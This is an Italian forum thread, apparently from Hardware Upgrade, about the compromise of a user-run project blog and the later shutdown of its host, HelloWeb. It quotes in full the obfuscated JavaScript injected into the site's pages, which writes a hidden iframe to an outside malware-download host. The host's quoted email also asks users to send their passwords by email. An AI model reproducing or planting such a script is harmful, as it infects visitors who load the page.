www.hwupgrade.helloweb.eu sotto attacco

[xcdegasp]

ebbene sì sono arrivati anche lì gli attacchi, sul blog creato per alcuni progetti sviluppati dagli utenti di queste aree, oggi alle 08:20 sono state modificate due pagine sorgenti iniettando codice offuscato:

Codice:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6b%61%72%61%62%6f%6b%2e%62%69%7a%2f%73%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%33%33%37%31%29%2b%27%65%61%34%38%5c%27%20%77%69%64%74%68%3d%31%35%31%20%68%65%69%67%68%74%3d%32%32%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

gli attributi dei due files erano corretti ad ogni modo è stato un automatismo a iniettarli inquanto a fondo pagina
la destinazione era un bel "Virus or unwanted program 'HTML/Dldr.Iframe.DP [virus]'"

ovviamente ho i file con tale modifica per chi volesse

mi correggo, tutti i file index.php sono stati modificati...

[c.m.g]

beh prima o poi sarebbe accaduto!

[wizard1993]

mi verrebbe voglia di massacrarli qualche volta, hai provveduto a togliere?

[juninho85]

"è segno che stiamo facendo un buon lavoro" cit.

[xcdegasp]

concordo con juninho85 considerando che oggi, sfiga vuole dopol'infezione, abbiamo avuto visite dal japan e francia

comunque un lavoraccio correggere tutto e veramente lunghetto, modificarli a loro c'è voluto solo 3 minuti

ora è lindo come fosse passato mastrolindo (= eraser? )

[juninho85]

scusa ma...non basta "semplicemente" ripulire da quelle 2 righette di codice?

[eraser]

Quote:

Originariamente inviato da xcdegasp

ora è lindo come fosse passato mastrolindo (= eraser? )

Comunque, in generale, mi preme di chiedervi un'altra cosa.

Per l'utilizzo del nome "hwupgrade" nel vostro sito, sia nel link che in home page, avete sentito la redazione di Hardware Upgrade?

Il nome è registrato e non sarebbe corretto utilizzarlo senza chiederne l'autorizzazione.

Vedo ad esempio in home: Lista indirizzi IP dei server da bloccare by HwUpgrade.it.

Agli occhi di una persona che non sa nulla di tutto ciò, sembrerebbe che l'iniziativa sia nata dalla redazione. In aggiunta, se un qualche utente fosse rimasto infetto a causa di questo attacco, potrebbe dare la colpa alla redazione - la quale in realtà è ignara di tutta questa iniziativa.

Non voglio in alcun modo bacchettare o altro, sia chiaro. L'iniziativa è molto bella ed utile, però prima di utilizzare un nome di un'azienda senza specificare bene che si tratta di un'attività del tutto slegata dalla redazione e portata avanti in maniera autonoma dagli utenti del forum penso che magari dovreste informarne i legali possessori.

[Nicodemo Timoteo Taddeo]

Quote:

Originariamente inviato da xcdegasp

ebbene sì sono arrivati anche lì gli attacchi,

Sì ma vi siete chiesti dove sta la vulnerabilità (software o umana che sia) cui si sono agganciati? Non è che se un giorno mi alzo con la luna storta, avvio firefox e mi metto a modificare pagine web come mi pare e piace.

Insomma trovo molto strano che ci sono siti ripetutamente violati, wintricks tanto per non fare nomi, e i cui gestori festeggiano a caviale e champagne ogni volta che rimediano alle compromissioni, come fosse la cosa più normale del mondo riceverne, e senza dare la minima impressione di voler fare tutto quello necessario per impedirne il ripetersi.

<polemic>
Secondo me c'è chi non ci capisce proprio nulla, e si limita solo a ripulire le pagine ogni volta
</polemic>




ps. a scanso di equivoci il mio discorso polemico non è rivolto a voi personalmente, ma al contesto generale.


Saluti.

[wizard1993]

Quote:

Originariamente inviato da Nicodemo Timoteo Taddeo

Sì ma vi siete chiesti dove sta la vulnerabilità (software o umana che sia) cui si sono agganciati? Non è che se un giorno mi alzo con la luna storta, avvio firefox e mi metto a modificare pagine web come mi pare e piace.

Insomma trovo molto strano che ci sono siti ripetutamente violati, wintricks tanto per non fare nomi, e i cui gestori festeggiano a caviale e champagne ogni volta che rimediano alle compromissioni, come fosse la cosa più normale del mondo riceverne, e senza dare la minima impressione di voler fare tutto quello necessario per impedirne il ripetersi.

<polemic>
Secondo me c'è chi non ci capisce proprio nulla, e si limita solo a ripulire le pagine ogni volta
</polemic>




ps. a scanso di equivoci il mio discorso polemico non è rivolto a voi personalmente, ma al contesto generale.


Saluti.

la piattaforma è apache all'utilma versione e worldpress nemmeno toccato, ora va a finire che la scrivo io la piattaforma il jsp

[Nicodemo Timoteo Taddeo]

Quote:

Originariamente inviato da wizard1993

la piattaforma è apache all'utilma versione e worldpress nemmeno toccato, ora va a finire che la scrivo io la piattaforma il jsp

È del tutto da escludere l'intervento umano, volente o a sua insaputa? Intendo dire: qualcuno nella catena della gestione ed hosting che si lascia sfuggire le password? Sto solo chiedendo perché mi sembra molto, troppo strano.

Per carità nessuno si offenda, ma insomma sti keylogger e/o trojan a qualcosa serviranno, o no?




Saluti.

[Lazza84]

Quote:

Originariamente inviato da eraser

Comunque, in generale, mi preme di chiedervi un'altra cosa.

Per l'utilizzo del nome "hwupgrade" nel vostro sito, sia nel link che in home page, avete sentito la redazione di Hardware Upgrade?

Il nome è registrato e non sarebbe corretto utilizzarlo senza chiederne l'autorizzazione.

Vedo ad esempio in home: Lista indirizzi IP dei server da bloccare by HwUpgrade.it.

Agli occhi di una persona che non sa nulla di tutto ciò, sembrerebbe che l'iniziativa sia nata dalla redazione. In aggiunta, se un qualche utente fosse rimasto infetto a causa di questo attacco, potrebbe dare la colpa alla redazione - la quale in realtà è ignara di tutta questa iniziativa.

Non voglio in alcun modo bacchettare o altro, sia chiaro. L'iniziativa è molto bella ed utile, però prima di utilizzare un nome di un'azienda senza specificare bene che si tratta di un'attività del tutto slegata dalla redazione e portata avanti in maniera autonoma dagli utenti del forum penso che magari dovreste informarne i legali possessori.

Hai perfettamente ragione, io credo che una tacita autorizzazione ci sia, ovvero all'inizio quando non c'era ancora la pagina web ma lo spazio iniziava a scarseggiare via degasp chiedemmo ai piani alti se fosse possibile ottenere un piccolo spazio nella sacra sezione download ma il miracolo non si avverò.
Credo che se gli girassero per il nome utilizzato l'avrebbero fatto presente...
Cmq se servono degli ulteriori chiarimenti espliciti nn saprei.... che dici degasp ?

[xcdegasp]

Quote:

Originariamente inviato da eraser

Comunque, in generale, mi preme di chiedervi un'altra cosa.

Per l'utilizzo del nome "hwupgrade" nel vostro sito, sia nel link che in home page, avete sentito la redazione di Hardware Upgrade?

Il nome è registrato e non sarebbe corretto utilizzarlo senza chiederne l'autorizzazione.

Vedo ad esempio in home: Lista indirizzi IP dei server da bloccare by HwUpgrade.it.

Agli occhi di una persona che non sa nulla di tutto ciò, sembrerebbe che l'iniziativa sia nata dalla redazione. In aggiunta, se un qualche utente fosse rimasto infetto a causa di questo attacco, potrebbe dare la colpa alla redazione - la quale in realtà è ignara di tutta questa iniziativa.

Non voglio in alcun modo bacchettare o altro, sia chiaro. L'iniziativa è molto bella ed utile, però prima di utilizzare un nome di un'azienda senza specificare bene che si tratta di un'attività del tutto slegata dalla redazione e portata avanti in maniera autonoma dagli utenti del forum penso che magari dovreste informarne i legali possessori.

effettivamente non avevo chiesto se desse fastidio questo nome alla redazione,l'intento era il riferimento ai progetti del forum fatto dagli utenti ma ignoravo il fatto del collegamento alla redazione..
ad ogni modo come gestione siamo limitati dal fatto che il 90% è tutto gestito da helloweb.eu a differenza degli spazi apagamento nei quali hai la quasi totalità di controllo

pensate che proprio ieri sera ho aggiornato i vari plugin in uso inquanto era appena uscito un aggiornamento, questo a dimostrazione che per quanto uno si possa scervellare a mantenere alta la protezione c'è sempre da qualche parte una porta serrata male in una stanza che non è accessibile a noi ma dall'interno accedi tranquillamente al corridoio

[eraser]

Chiaro, come detto prima, non era per bacchettarvi Era semplicemente una annotazione per il futuro, onde evitare poi anche disguidi di natura legale (non hwupgrade, ma ci sono società che non guardano in faccia a chi e a cosa, prima denunciano e poi ne parlano)

[xcdegasp]

hai fatto bene a evidenziarlo perchè proprio non ci pensavo

[xcdegasp]

Riesumo questo thread per pubblicare un'email appena giunta dalla direzione di Helloweb.eu:

Quote:

Gentile utente, i servizi di HelloWeb Lunedì 09/02/2009 verranno sospesi a tempo indeterminato per cui chi ha un sito attivo dovrà effettuare i backup del proprio sito e trasferirsi su altro hoster entro lunedì poichè non sarà più possibile avere un backup dei files dopo quella data! Il motivo è principalmente dovuto a molte persone disoneste che svolgono attività illecite appoggiandosi anche sui nostri server! Lo staff HelloWeb ha fatto un lavoro immane per cercare di mantenere i propri servizi puliti ma evidentemente non è bastato per cui siamo costretti a chiudere i nostri servizi. Tutti gli utenti che hanno acquistato da noi SpazioWeb e dominio potranno richiedere l'eventuale chiave di trasferimento e il rimborso del servizio acquistato inviando una mail a: rescue@helloweb.eu indicando il proprio username, password e il servizio acquistato e il nome del dominio. Il Backup e il trasferimento dei dati verso un altro host è a proprio carico e va effettuato entro Lunedì 09/02/2009 Vogliamo far notare che qualora ci siano problemi i rimborsi verranno effettuati quando ciò sarà possibile nel minor tempo. Ci dispiace dare così poco tempo per il trasferimento dei dati ma non sappiamo quanto tempo ci rimane. Siamo profondamente delusi e amareggiati per anni e anni di lavoro buttati al vento in pochissimi giorni! Speriamo tanto che questo non sia un addio ma un arrivederci. Ringraziamo i nostri utenti ONESTI che ci hanno sempre appoggiato e supportato nonostante i problemi avuti. GRAZIE infinitamente per tutto Lo staff di HelloWeb

[Unax]

Quote:

Originariamente inviato da xcdegasp

Riesumo questo thread per pubblicare un'email appena giunta dalla direzione di Helloweb.eu:

a chi si riferiscono con il termine utenti disonesti?

[xcdegasp]

Quote:

Originariamente inviato da Unax

a chi si riferiscono con il termine utenti disonesti?

sicuramente a coloro che eseguivano questo tipo di attacchi